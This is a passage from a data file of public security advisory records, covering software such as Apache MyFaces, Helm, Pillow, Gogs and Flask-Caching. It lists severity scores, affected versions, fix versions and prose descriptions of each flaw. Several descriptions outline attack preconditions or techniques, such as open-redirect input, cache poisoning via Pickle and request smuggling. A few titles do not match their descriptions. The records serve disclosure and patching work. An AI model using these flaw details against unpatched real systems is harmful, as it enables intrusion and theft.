[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'nukeviet/nukeviet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.04'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-7725'}, {'type': 'WEB', 'url': 'https://github.com/nukeviet/nukeviet/pull/2740/commits/05dfb9b4531f12944fe39556f58449b9a56241be'}, {'type': 'WEB', 'url': 'https://github.com/nukeviet/nukeviet/blob/4.3.04/CHANGELOG.txt'}, {'type': 'WEB', 'url': 'https://github.com/nukeviet/nukeviet/blob/nukeviet4.3/CHANGELOG.txt'}, {'type': 'WEB', 'url': 'https://github.com/nukeviet/nukeviet/compare/4.3.03...4.3.04'}]
{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T22:08:23Z', 'nvd_published_at': '2020-12-31T05:15:00Z'}
1.4.0
GHSA-v592-xf75-856p
2021-05-21T21:52:58Z
2021-06-29T21:12:56Z
null
['CVE-2020-26240']
Erroneous Proof of Work calculation in geth
### Impact An ethash mining DAG generation flaw in Geth could cause miners to erroneously calculate PoW in an upcoming epoch (estimated early January, 2021). This happened on the ETC chain on 2020-11-06. This issue is relevant only for miners, non-mining nodes are unaffected. ### Patches This issue is also fixed as of 1.9.24. Thanks to @slavikus for bringing the issue to our attention and writing the fix. ### For more information If you have any questions or comments about this advisory: * Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum) * Email us at [security@ethereum.org](mailto:security@ethereum.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.24'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum/consensus'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.24'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-v592-xf75-856p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26240'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/pull/21793'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/d990df909d7839640143344e79356754384dcdd0'}, {'type': 'WEB', 'url': 'https://blog.ethereum.org/2020/11/12/geth_security_release/'}]
{'cwe_ids': ['CWE-682'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T21:52:58Z', 'nvd_published_at': None}
1.4.0
GHSA-gq67-pp9w-43gp
2021-05-07T21:12:38Z
2021-06-16T17:31:39Z
null
['CVE-2021-26296']
Cryptographically weak CSRF tokens in Apache MyFaces
In the default configuration, Apache MyFaces Core versions 2.2.0 to 2.2.13, 2.3.0 to 2.3.7, 2.3-next-M1 to 2.3-next-M4, and 3.0.0-RC1 use cryptographically weak implicit and explicit cross-site request forgery (CSRF) tokens. Due to that limitation, it is possible (although difficult) for an attacker to calculate a future CSRF token value and to use that value to trick a user into executing unwanted actions on an application. Mitigation: Existing web.xml configuration parameters can be used to direct MyFaces to use SecureRandom for CSRF token generation: org.apache.myfaces.RANDOM_KEY_IN_VIEW_STATE_SESSION_TOKEN=secureRandom org.apache.myfaces.RANDOM_KEY_IN_CSRF_SESSION_TOKEN=secureRandom org.apache.myfaces.RANDOM_KEY_IN_WEBSOCKET_SESSION_TOKEN=secureRandom
[]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.myfaces.core:myfaces-core-module'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.25'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.myfaces.core:myfaces-core-module'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.19'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.myfaces.core:myfaces-core-module'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.14'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.myfaces.core:myfaces-core-module'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.8'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26296'}, {'type': 'WEB', 'url': 'https://github.com/apache/myfaces/commit/cc6e1cc7b9aa17e52452f7f2657b3af9c421b2b2'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/MYFACES-4373'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2b73e2356c6155e9ec78fdd8f72a4fac12f3e588014f5f535106ed9b%40%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210528-0007/'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/161484/Apache-MyFaces-2.x-Cross-Site-Request-Forgery.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2021/Feb/66'}]
{'cwe_ids': ['CWE-330', 'CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T21:12:38Z', 'nvd_published_at': '2021-02-19T09:15:00Z'}
1.4.0
GHSA-p2rp-cmjq-r7wm
2021-05-04T20:57:28Z
2021-06-16T17:19:12Z
null
['CVE-2020-11977']
Shell command injection in Apache Syncope
In Apache Syncope 2.1.X releases prior to 2.1.7, when the Flowable extension is enabled, an administrator with workflow entitlements can use Shell Service Tasks to perform malicious operations, including but not limited to file read, file write, and code execution.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.syncope:syncope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.7'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11977'}, {'type': 'WEB', 'url': 'https://syncope.apache.org/security#CVE-2020-11977:_Remote_Code_Execution_via_Flowable_workflow_definition'}]
{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T20:57:28Z', 'nvd_published_at': '2020-09-15T20:15:00Z'}
1.4.0
GHSA-r6h7-5pq2-j77h
2021-12-13T14:30:44Z
2021-06-15T16:10:11Z
null
['CVE-2020-10729']
Insufficiently random values in Ansible
A flaw was found in the use of insufficiently random values in Ansible. Two random password lookups of the same length generate the equal value as the template caching action for the same file since no re-evaluation happens. The highest threat from this vulnerability would be that all passwords are exposed at once for the file. This flaw affects Ansible Engine versions before 2.9.6.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10729'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/34144'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/67429/'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1831089'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/blob/v2.9.6/changelogs/CHANGELOG-v2.9.rst'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}]
{'cwe_ids': ['CWE-330'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T19:55:24Z', 'nvd_published_at': '2021-05-27T19:15:00Z'}
1.4.0
GHSA-h395-qcrw-5vmq
2023-08-29T19:56:23Z
2021-06-23T17:53:21Z
null
['CVE-2020-28483']
Inconsistent Interpretation of HTTP Requests in github.com/gin-gonic/gin
When gin is exposed directly to the internet, a client's IP can be spoofed by setting the X-Forwarded-For header. This affects all versions of package github.com/gin-gonic/gin under 1.7.7.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/gin-gonic/gin'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.7'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28483'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/issues/2232'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/issues/2473'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/issues/2862'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/pull/2474#23issuecomment-729696437'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/pull/2632'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/pull/2675'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/pull/2844'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/pull/2844/files#diff-e6ce689a25eaef174c2dd51fe869fabbe04a6c6afbd416b23eda138c82e761baR1432'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/commit/03e5e05ae089bc989f1ca41841f05504d29e3fd9'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/commit/5929d521715610c9dd14898ebbe1d188d5de8937'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/commit/bfc8ca285eb46dad60e037d57c545cd260636711'}, {'type': 'PACKAGE', 'url': 'https://github.com/gin-gonic/gin'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/releases/tag/v1.7.0'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/releases/tag/v1.7.7'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0052'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGINGONICGIN-1041736'}]
{'cwe_ids': ['CWE-113', 'CWE-444'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T21:46:50Z', 'nvd_published_at': '2021-01-20T18:15:00Z'}
1.4.0
GHSA-5mv9-q7fq-9394
2023-01-10T16:08:38Z
2021-06-01T21:21:01Z
null
['CVE-2021-32635']
Action Commands (run/shell/exec) Against Library URIs Ignore Configured Remote Endpoint
### Impact Due to incorrect use of a default URL, `singularity` action commands (`run`/`shell`/`exec`) specifying a container using a `library://` URI will always attempt to retrieve the container from the default remote endpoint (`cloud.sylabs.io`) rather than the configured remote endpoint. An attacker may be able to push a malicious container to the default remote endpoint with a URI that is identical to the URI used by a victim with a non-default remote endpoint, thus executing the malicious container. Only action commands (`run`/`shell`/`exec`) against `library://` URIs are affected. Other commands such as `pull` / `push` respect the configured remote endpoint. ### Patches All users should upgrade to Singularity 3.7.4 or later. A patch was applied at: https://github.com/sylabs/singularity/commit/d52ae9d13979733c5e987a566fae59ed6f1bf796 ### Workarounds Users who only interact with the default remote endpoint are not affected. Installations with an execution control list configured to restrict execution to containers signed with specific secure keys are not affected. ### For more information General questions about the impact of the advisory can be asked in the: - [SingularityCE Slack Channel](https://singularityce.slack.com) - [SingularityCE Mailing List](https://groups.google.com/g/singularity-ce) Any sensitive security concerns should be directed to: security@sylabs.io See our Security Policy here: https://sylabs.io/security-policy
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/sylabs/singularity'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.2'}, {'fixed': '3.7.4'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/hpcng/singularity/security/advisories/GHSA-jq42-hfch-42f3'}, {'type': 'WEB', 'url': 'https://github.com/sylabs/singularity/security/advisories/GHSA-5mv9-q7fq-9394'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32635'}, {'type': 'WEB', 'url': 'https://github.com/sylabs/singularity/commit/d52ae9d13979733c5e987a566fae59ed6f1bf796'}, {'type': 'PACKAGE', 'url': 'https://github.com/sylabs/singularity'}, {'type': 'WEB', 'url': 'https://github.com/sylabs/singularity/releases/tag/v3.7.4'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-50'}]
{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T20:04:35Z', 'nvd_published_at': '2021-05-28T21:15:00Z'}
1.4.0
GHSA-rm7f-mpcj-w4f6
2021-05-19T22:11:25Z
2021-06-16T17:17:24Z
null
['CVE-2021-31164']
Command injection in Apache Unomi
Apache Unomi prior to version 1.5.5 allows CRLF log injection because of the lack of escaping in the log statements.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.unomi:unomi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.5'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31164'}, {'type': 'WEB', 'url': 'http://unomi.apache.org/security/cve-2021-31164'}]
{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T22:11:25Z', 'nvd_published_at': '2021-05-04T07:15:00Z'}
1.4.0
GHSA-xfhh-g9f5-x4m4
2021-06-30T16:53:56Z
2021-06-30T16:51:31Z
null
['CVE-2020-36049']
Resource exhaustion in socket.io-parser
The `socket.io-parser` npm package before versions 3.3.2 and 3.4.1 allows attackers to cause a denial of service (memory consumption) via a large packet because a concatenation approach is used.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'socket.io-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'socket.io-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.4.1'}]}], 'versions': ['3.4.0']}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36049'}, {'type': 'WEB', 'url': 'https://github.com/socketio/socket.io-parser/commit/dcb942d24db97162ad16a67c2a0cf30875342d55'}, {'type': 'WEB', 'url': 'https://blog.caller.xyz/socketio-engineio-dos/'}, {'type': 'WEB', 'url': 'https://github.com/bcaller/kill-engine-io'}, {'type': 'WEB', 'url': 'https://github.com/socketio/socket.io-parser/releases/tag/3.3.2'}, {'type': 'WEB', 'url': 'https://github.com/socketio/socket.io-parser/releases/tag/3.4.1'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/socket.io-parser'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T23:06:09Z', 'nvd_published_at': '2021-01-08T00:15:00Z'}
1.4.0
GHSA-h39g-q63v-4h9p
2022-06-01T20:15:30Z
2021-06-01T21:56:23Z
null
['CVE-2021-33038']
Exposure of sensitive information to an unauthorized actor in HyperKitty
An issue was discovered in management/commands/hyperkitty_import.py in HyperKitty prior to 1.3.5. When importing a private mailing list's archives, these archives are publicly visible for the duration of the import. For example, sensitive information might be available on the web for an hour during a large migration from Mailman 2 to Mailman 3.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'HyperKitty'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.5'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33038'}, {'type': 'PACKAGE', 'url': 'https://gitlab.com/mailman/hyperkitty'}, {'type': 'WEB', 'url': 'https://gitlab.com/mailman/hyperkitty/-/blob/master/doc/news.rst#L83-L87'}, {'type': 'WEB', 'url': 'https://gitlab.com/mailman/hyperkitty/-/commit/9025324597d60b2dff740e49b70b15589d6804fa'}, {'type': 'WEB', 'url': 'https://gitlab.com/mailman/hyperkitty/-/issues/380'}, {'type': 'WEB', 'url': 'https://techblog.wikimedia.org/2021/06/11/discovering-and-fixing-cve-2021-33038-in-mailman3/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4922'}]
{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T20:13:23Z', 'nvd_published_at': '2021-05-26T14:15:00Z'}
1.4.0
GHSA-q5hq-fp76-qmrc
2021-09-15T18:31:36Z
2021-06-08T18:49:36Z
null
['CVE-2021-28677']
Uncontrolled Resource Consumption in Pillow
An issue was discovered in Pillow before 8.2.0. For EPS data, the readline implementation used in EPSImageFile has to deal with any combination of \r and \n as line endings. It used an accidentally quadratic method of accumulating lines while looking for a line ending. A malicious EPS file could use this to perform a DoS of Pillow in the open phase, before an image was accepted for opening.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.2.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28677'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/5377'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/07/msg00018.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQHA5HAIBOYI3R6HDWCLAGFTIQP767FL/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.2.0.html#cve-2021-28677-fix-eps-dos-on-open'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T21:33:17Z', 'nvd_published_at': '2021-06-02T16:15:00Z'}
1.4.0
GHSA-cpgw-2wxr-pww3
2021-05-20T20:55:39Z
2021-06-29T18:32:39Z
null
['CVE-2018-15178']
Open Redirect
Open redirect vulnerability in Gogs before 0.12 allows remote attackers to redirect users to arbitrary websites and conduct phishing attacks via an initial /\ substring in the user/login redirect_to parameter, related to the function isValidRedirect in routes/user/auth.go.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'gogs.io/gogs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-15178'}, {'type': 'WEB', 'url': 'https://github.com/gogs/gogs/issues/5364'}, {'type': 'WEB', 'url': 'https://github.com/gogs/gogs/pull/5365'}, {'type': 'WEB', 'url': 'https://github.com/gogs/gogs/commit/1f247cf8139cb483276cd8dd06385a800ce9d4b2'}]
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T20:55:39Z', 'nvd_published_at': None}
1.4.0
GHSA-wm2m-xrrp-j74c
2021-05-14T21:29:08Z
2021-06-18T18:31:40Z
null
['CVE-2020-7655']
HTTP Request Smuggling in netius
netius prior to 1.17.58 is vulnerable to HTTP Request Smuggling. HTTP pipelining issues and request smuggling attacks might be possible due to incorrect Transfer encoding header parsing which could allow for CL:TE or TE:TE attacks.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'netius'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.17.58'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7655'}, {'type': 'WEB', 'url': 'https://github.com/hivesolutions/netius/commit/9830881ef68328f8ea9c7901db1d11690677e7d1'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-NETIUS-569141'}]
{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-14T21:29:08Z', 'nvd_published_at': '2020-05-21T15:15:00Z'}
1.4.0
GHSA-656c-6cxf-hvcv
2022-09-20T13:31:06Z
2021-06-18T18:33:40Z
null
['CVE-2021-33026']
Deserialization of Untrusted Data in Flask-Caching
Flask-Cache adds easy cache support to Flask. The Flask-Caching extension through 1.10.1 for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation. If an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.), they can construct a crafted payload, poison the cache, and execute Python code. However, this is not a high-severity issue, as for an attack like this to work, an attacker must: 1. Be able to write arbitrary values to the cache 2. Be able to generate a cache key that will collide with a value being read by the application 3. Cause the application to read a maliciously-injected value Any situation where all 3 of those is true is a situation where the application has larger problems; for example, if someone's able to inject malicious cached rendered pages into a Flask app's cache, then they can make the website say literally anything they want, regardless of whether it involves the execution of remote code. Basically, the Pickle vulnerability follows from a website already being extremely vulnerable (due to conditions 1 and 2 being met).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Flask-Caching'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.10.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33026'}, {'type': 'WEB', 'url': 'https://github.com/pallets-eco/flask-caching/pull/209#issuecomment-1136397937'}, {'type': 'WEB', 'url': 'https://github.com/sh4nks/flask-caching/pull/209'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-656c-6cxf-hvcv'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/flask-caching/PYSEC-2021-13.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/sh4nks/flask-caching'}]
{'cwe_ids': ['CWE-269', 'CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T17:25:38Z', 'nvd_published_at': '2021-05-13T23:15:00Z'}
1.4.0
GHSA-6m8p-x4qw-gh5j
2021-07-14T19:43:22Z
2021-06-09T17:34:09Z
null
['CVE-2020-12690']
Insufficient Session Expiration in OpenStack Keystone
An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. The list of roles provided for an OAuth1 access token is silently ignored. Thus, when an access token is used to request a keystone token, the keystone token contains every role assignment the creator had for the project. This results in the provided keystone token having more role assignments than the creator intended, possibly giving unintended escalated access.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'keystone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '15.0.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'keystone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '16.0.0.0rc1'}, {'fixed': '16.0.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12690'}, {'type': 'WEB', 'url': 'https://bugs.launchpad.net/keystone/+bug/1873290'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re4ffc55cd2f1b55a26e07c83b3c22c3fe4bae6054d000a57fb48d8c2@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.openstack.org/ossa/OSSA-2020-005.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4480-1/'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2020/05/06/6'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/05/07/3'}]
{'cwe_ids': ['CWE-613'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T21:08:40Z', 'nvd_published_at': '2020-05-07T00:15:00Z'}
1.4.0
GHSA-56hp-xqp3-w2jf
2023-08-30T18:45:08Z
2021-06-23T18:14:15Z
null
[]
Helm passes repository credentials to alternate domain
While working on the Helm source, a Helm core maintainer discovered a situation where the username and password credentials associated with a Helm repository could be passed on to another domain referenced by that Helm repository. ### Impact The `index.yaml` within a Helm chart repository contains a reference where to get the chart archive for each version of a chart. The reference can be relative to the `index.yaml` file or a URL to location. The URL can point to any domain and this is a feature leveraged by Helm users. For example, an `index.yaml` file can be hosted on GitHub pages while the chart archives are hosted as GitHub releases. These are on different domain names and the `index.yaml` file points to the other domain. When a username and password were associated with a Helm repository the username and password were also passed on to other domains referenced in the `index.yaml` file. This occurred when Helm went to retrieve a specific chart archive on the other domain. ### Patches This issue has been resolved in 3.6.1. There is a slight behavior change to credential handling with regard to repositories. Usernames and passwords are only passed to the URL location of the Helm repository by default. The username and password are scoped to the scheme, host, and port of the Helm repository. To pass the username and password to other domains Helm may encounter when it goes to retrieve a chart, the new `--pass-credentials` flag can be used. This flag restores the old behavior for a single repository as an opt-in behavior. ### Workarounds If you use a username and password for a Helm repository you can audit the Helm repository in order to check for another domain being used that could have received the credentials. In the `index.yaml` file for that repository, look for another domain in the `urls` list for the chart versions. If there is another domain found and that chart version was pulled or installed the credentials would have been passed on. ### For more information Helm's security policy is spelled out in detail in our [SECURITY](https://github.com/helm/community/blob/master/SECURITY.md) document.
[]
[{'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/helm/helm/security/advisories/GHSA-56hp-xqp3-w2jf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32690'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/61d8e8c4a6f95540c15c6a65f36a6dd0a45e7a2f'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-56hp-xqp3-w2jf'}, {'type': 'PACKAGE', 'url': 'https://github.com/helm/helm'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/releases/tag/v3.6.1'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0384'}]
{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-16T19:43:50Z', 'nvd_published_at': None}
1.4.0
GHSA-gchq-9r68-6jwv
2023-05-24T14:30:40Z
2021-06-16T17:24:31Z
null
['CVE-2021-21648']
Cross-Site Request Forgery in Jenkins Credentials Plugin
Jenkins Credentials Plugin prior to 2.3.19, 2.3.15.1, 2.3.14.1, 2.3.13.1, 2.3.7.1, and 2.3.0.1 does not escape user-controlled information on a view it provides, resulting in a reflected cross-site scripting (XSS) vulnerability. Credentials Plugin 2.3.19, 2.3.15.1, 2.3.14.1, 2.3.13.1, 2.3.7.1, and 2.3.0.1 restricts the user-controlled information it provides to a safe subset.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
